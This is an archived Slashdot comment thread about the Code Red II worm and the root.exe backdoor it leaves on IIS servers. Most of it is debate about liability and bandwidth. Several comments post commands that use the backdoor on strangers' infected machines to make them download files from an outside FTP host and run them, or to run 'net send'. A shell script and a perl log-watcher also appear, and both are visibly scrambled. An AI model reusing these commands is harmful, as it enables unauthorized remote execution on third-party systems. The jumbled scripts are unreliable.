Slashdot Mirror
Code Red II: Shells for the Taking
sigurdur writes "It seems there is a new and more malicious version of Code Red out there. This one seems to try and copy cmd.exe into a position where it is accesible to us all - the scripts directory. So far I have seen it reported on the intrusions-list at incidents.org where they also just put up a notice about this third generation Code Red worm." I still think sircam is more annoying since it affects every email user, and not primarily poorly administered websites. But imagine how much bandwidth Code Red and Sircam have wasted in the last few weeks?
None of the above.
The two historical precedents that come to mind are:
- The Grand Canyon midair collision on 30 June 1956
- The sinking of the Titanic
In both cases, technologies failed in ways that (in hindsight) were predictable and even inevitable consequences of growth beyond the their roots. In both cases, the response was moderate, incremental, and designed to preserve existing investments in these technologies. The lesson is that the "breaking point" for a widespread infrastructural technology is very hard to reach. And, like it or not, Windows is one of these technologies.Instead, what we'll see happen is more attention to security, taken in small steps. More people will subscribe to alert services, and they'll be willing to pay more for them. Bosses will start asking sysadmins what they've done for security today, and be more willing to sign purchase orders for security-related work. ISPs will pay a bit more attention to open ports on their home users, and some will scan their networks for known security vulnerabilities. OEMs configuring systems for naive users will discover that people will pay for a "safe out of the box" configuration, so they'll start to offer one. And so on, and so on....
The normal state for an economically useful thing is to be stressed, but not stressed to the breaking point. This should be pretty obvious: if it's not stressed, it was uneconomically overbuilt. We are very far from the breaking point for Windows.
Submissions can be made by following these instructions.
Key to financial independence: Spend less than you earn. Save and invest the difference. Do it for a long time.
I kind of find myself wondering, which wastes more bandwidth: the virus itself of all of the discussion about the virus?
I'm assuming the virus wastes vastly more. That said, take a look at the way every news site is covering it, the large images they have accompanying the stories and the vast numbers of people reading them because MSN messenger tells them it's important. I don't know if there is any way of measuring the bandwidth wasted by each but it'd be an interesting ratio to see, if there was.
First one of the top dogs in the place sent sircam throughout the company. This was a really bad hair day.
Then they had a separate second problem where user mail boxes flooded out crashing the mail server, among other strange things. Imagine users with DSL lines sending out multimegabyte files that bounce. Considering that most ISPs configure the drive space for mail based on average usage of users, and do not set aside the actual amount of drive space for user mail, etc. that has been promised for all users.
BOOM!
If this keeps happening, this is going to be bad for business in a lot of places.
"It is a greater offense to steal men's labor, than their clothes"
PLEASE MIRROR THIS and post your mirror URLs in reply to this message (subject Mirror of CodeRed2) since that server is a club server, low bandwidth, low budget. But very secure (Debian on Sparc and well maintained :-)
SlashDot (the pikers )-: wouldn't let me post directly to this page.
Got time? Spend some of it coding or testing
Unfortunately, it doesn't look like the root.exe installed by Code Red has Administrator privaleges, which iisreset.exe needs. Or at least, that's my guess, since it isn't working.
$x='S24;r)>63/* h@<5+oZ)32"5cz';$me='phroggy'x$];
$x=~y+ -xz+\0-Tx+;print$_^chop$me for split'',$x;
You can't sue MS (they are bigger then the govt prectically). But you can probably sue and company which uses IIS and stores your personal data. If that comapny was using IIS and they failed to patch their system then they have been criminally negligent in their duties. A few suits and all companies will drop IIS like a hot potato.
Everybody wins.
War is necrophilia.
There's been an IIS patch available for several months which blocks the hole exploited by CodeRed. You can't sue M$ for negligence but you might be able to sue any of the web server owners who haven't applied the patch.
Actually, there has been a beneficial effect with CodeRed (in the UK at least). I have seen several reports on British network news programmes that talk about "security flaws in M$ software", not "security flaws in the Internet". It's quite a step forward for the media here not to treat M$ software and Internet / PC software as being effectively synonymous. There is a faint but real message that the problem is Microsoft.
All I want is a secure system where it's easy to do anything I want. Is that too much to ask ~~ Randall Munroe
- sourceforge.com was hacked
- themes.org was hacked
- apache.org was hacked
- the ramen worm
- the lion worm
- the knark rootkit
Things were so bad that Microsoft felt cocky enough to make claim that open source software has "inherent security risks".Well, you can quite rightly laugh at Mundie now for his audacity, but it's ridiculous to start calling for lawsuits against software makers. Do you really believe there is never going to be another exploit targeting open source software? Do you want the creators of that open source software to be sued too when that happens?
Microsoft is a big company, and it can afford lawsuits like that. But if, say, the creators of BIND were sued for an exploit, that would probably be the end of BIND. And it's unlikely anyone would be eager to write an open source replacement, with the threat of lawsuits looming over any potential open source project.
It's gotten to the editors! It's everywhere! It causes itself to be posted multiple times per day! Hide the women and children!
Slashdot 's editors are dickheads
(Copied from the other thread, for those who are working on a way to fix this worm)
/pub/cr
/scripts/root.exe?+%2fc+echo+bin+%3etmpfile | telnet $1 80
/scripts/root.exe?+%2fc+echo+get+$DIR%2f$2+%3e%3et mpfile | telnet $1 80
/scripts/root.exe?+%2fc+echo+ftp+%2dA+%2ds%3atmpfi le+$FTP+%3edlfile%2ecmd | telnet $1 80
/scripts/root.exe?+/k+dlfile%2ecmd | telnet $1 80
:)
I played around for a few hours with this, trying to make a ghetto script that would fix the servers. There's no way for me to be sure my other stuff works, but the thing I did get working was a script to download files to the infected server from an ftp site.
#!/bin/sh
# Code Red ][ Download File script
# Usage: dlfile.sh infectedIP filename
#
# Please set the $ftp and $dir values to
# the ftp and directory of the patch and shutdown repository
# For ftp.youhavesetup.com
FTP="ftp%2eyouhavesetup%2ecom"
# Directory
DIR="%2fpub%2fcr"
echo GET
sleep 1
echo GET
sleep 1
echo GET
# Note that slashcode inserts a space in the string 'tmpfile' on both these lines, remove before running
sleep 1
echo GET
I tried setting it up and got the servers to download the patches, but I can't be sure that they are actually run. (I don't have an infected machine to test.) Also, I was unable to figure out a way to get the machines to reboot or restart IIS. It appears root.exe has limited permission in what it can do (as another poster or two stated.) There might be hacks that will do what I want to, but I'm too tired to mess with this anymore
--
I've always wanted to be able to telnet into my Windows box. Where can i get this virus?
--
Mod up a post Rob doesn't like and you'll never mod again
I've got a cable modem on nash1.tn.home.com, and my iptables log is seeing a huge number of hits (we're talking an average of several a minute, more or less) to port 80. Since I'm not actually running a web server, I don't have the logs that tell me if this is in fact Code Red, but I suspect that's what a huge amount of this activity is.
It's depressing, really.
-Rob
I think Code Red (and Sircam, which your average Joe will probably lump together with Code Red in his mind) will be the virus that breaks the camel's back. It's gotten constant publicity, it's coming back for a second round, and this time, it wants blood.
:-) Seriously, though, things may get slow, but I have a feeling vigilante efforts (counter-worms, Apache scripts that reboot infected attacking Win boxes, etc.) will keep this from happening.
What will happen? I don't know, but here are some possibilities:
Revolt against Microsoft software. We'd all love for this to happen, but their PR machine is probably too good. Still, we can always hope people realize that MS bears a large part of the responsibility here.
Lawsuit. Assuming the virus writers aren't found, the next logical targets will be Microsoft, and owners of a large number of infected hosts. Why it probably won't happen: suing Microsoft over this draws attention to the fact that your company's computer systems are insecure, and that your admins were too lazy/stupid to install the patch. Microsoft can always hide behind their patch, which was available well in advance, and claim that "everyone knows that bugs happen, and it's up to admins to keep up to date" (never mind that this contradicts their own marketing material--when has inconsistency ever stopped marketing before?). Suing somebody with a large bunch of infected hosts is also silly, since, to be infected by them, you have to be just as inept as them.
Government Intervention. Some state governors may push silly state bills, but they'll be irrelevant. What would really get interesting is if the Feds pass some sort of laws, either making people responsible for keeping their systems secure, or defining what kind of liability software manufacturers are exposed to in these circumstances (i.e., can you sue MS? For how much?). Why it probably won't happen. With Congress and Bush on vacation, not much will get done in at least the next month, and things will probably have come to a head before then. Only if this round does serious damage (perhaps the world's biggest DDoS against some high-profile targets, like Akamai), and another generation of Code Red pops up in September (just in time to catch all those college PCs with their pirated copies of Windows 2000 Server and high bandwidth), will this become a real possibility.
Internet Collapses. I really doubt it, I just had to say it to satisfy Cringley
So, which will it be, folks? This would make a great SlashPoll.
heheh! Not only is it a fine remote administration feature, but it's also pretty slick the way machines upgraded in this way advertise their new status to everyone with a webserver on port 80.
Geeky modern art T-shirts
To notify the administrators of the attacking servers you can send their IP followed by the date and time of the attack to aris-report@securityfocus.com. - Please use this format because it's a robot address. http://securityfocus.com/announcements/310
I still think sircam is more annoying since it affects every email user
Every email user?!? CmdrTaco must run Windows. Let's get him!
Is there a Windows command line equivalent to "shutdown -h now", by any chance? I know I really shouldn't do it, but I'd be so sorely tempted to write a script that would shut down any infected box that scanned mine.
The more I think about it, the more it seems like a permissible act of self defense. It does no harm to the infected box (if the worm doesn't write itself to disk, as I've read, it actually helps) and prevents the infected box from being used to perpetuate more abuse.
Hmm . . .
If you take the water away completely and hold the frog over the heat sorce itself it will roast.
Sorry, I'm "in a mood" today and I couldn't help myself.
Still, it's interesting. If you put the frog in cold water and slowly turn up the heat what it will do, being cold blooded, is go to sleep long before it dies and *poaches.*
What is the relevance and why should anyone care? Lobster.
The correct way to cook a lobster, not matter what *anyone* tells you, is to put it in cold water and bring the heat up. The lobster relaxes and goes to sleep before it cooks.
If you just dump it in hot water it goes " Eeeeeeeeeeee," tightens up all of its muscles and pumps lactic acid throughout its system before it dies.
Starting in cold water is both more humane and results in quite noticably tastier lobster.
KFG
I was curious just how often RedCode attacks. Sure, looking through the apache log files is nice, but it just didn't give me the sense of urgency... the quick succession at which attacks take place. So, I whipped up a quick perl script to play a noise every time I was "attacked". Needless to say, it's getting kind of annoying, but it still is incredible:
/var/log/your-access.log | grep XXXXXXXXXXXXX | cut -d \" \" -f 1 | wc -l > attacks_b"); /dev/null");
#!/usr/bin/perl
while(1) {
system("cat
$returnval = system("diff attacks_a attacks_b >
if(0!=$returnval) {
system("cp -f attacks_b attacks_a");
system("play buzzer2.aiff &");
}
sleep(1);
}
char sig[120] = "\0"
From the article:
The FBI has dismissed using any hack-back tactic as well. "It is not something that we could consider," said spokeswoman Debbie Weierman. "It would basically be viewed as an unauthorized intrusion."
It's not clear from the article whether such an 'unauthorized intrusion' by a private citizen would be illegal, but it might be worth thinking about before you go riding out to do battle with the Red Worm.
MSNBC has a longer story.
Fox News has a few words to say.
ABC copied the AP story.
CBS still seems to think the red tide is receeding.
Meanwhile the worm has knocked on my computer's door six times since I started this post. Uh, make that seven.
jill.c. Don't regard it as a malicious exploit, it's infact a very powerful remote administration tool. All our NT boxes are not attached to Internet so we don't worry. :)
To automatically notify webmasters of infected sites, if you have mod_perl/Apache, use this script:
h prerm
http://forum.swarthmore.edu/epigone/modperl/nehza
It identifies any attempt to access '/default.ida', looks up the MX records of the remote IP, and sends a notification to postmaster@. It is not a 'hack back', just a notification email.
Or you could setup default.ida as a perl script that telnets to the ip's 25 port and sends an email with the fact they have a box thats screwed.. like the guy did here.
A user on grc.security (news.grc.com) suggested using the Windows "net send" command to send a pop-up message to the infected user. net.exe won't talk across the Internet, but you ought to be able to run the net.exe program on the rooted IIS box, something like:
n et +send+%25COMPUTERNAME%25+You+have+been+infected+by +the+Code+Red+II+Worm+which+attempted+to+attack+my +server
http://ipaddress/c/inetpub/scripts/root.exe?/c+
%25COMPUTERNAME%25 translates to %COMPUTERNAME%, which returns the Windows hostname. I know that works from one of my failed attempts that gave me a reply, but with the above string, I get back a page with "Error in CGI Application" as
the title:
CGI Error
The specified CGI application misbehaved by not returning a complete set
of HTTP headers. The headers it did return are:
and it doesn't give me any return. Can anyone verify and/or debug this? It *might* be working.
The %USERDOMAIN% variable might be useful too, so you could send to the whole Windows domain, "Machine LUSER on DOOFUSDOMAIN is infected with Code Red II" or some such. %USERDOMAIN% is the machine name on systems on a workgroup.
Last week: 92
Last 32 hours: 196 (175 unique addresses)
Looks like it's concrete bunker time soon... )-:
Got time? Spend some of it coding or testing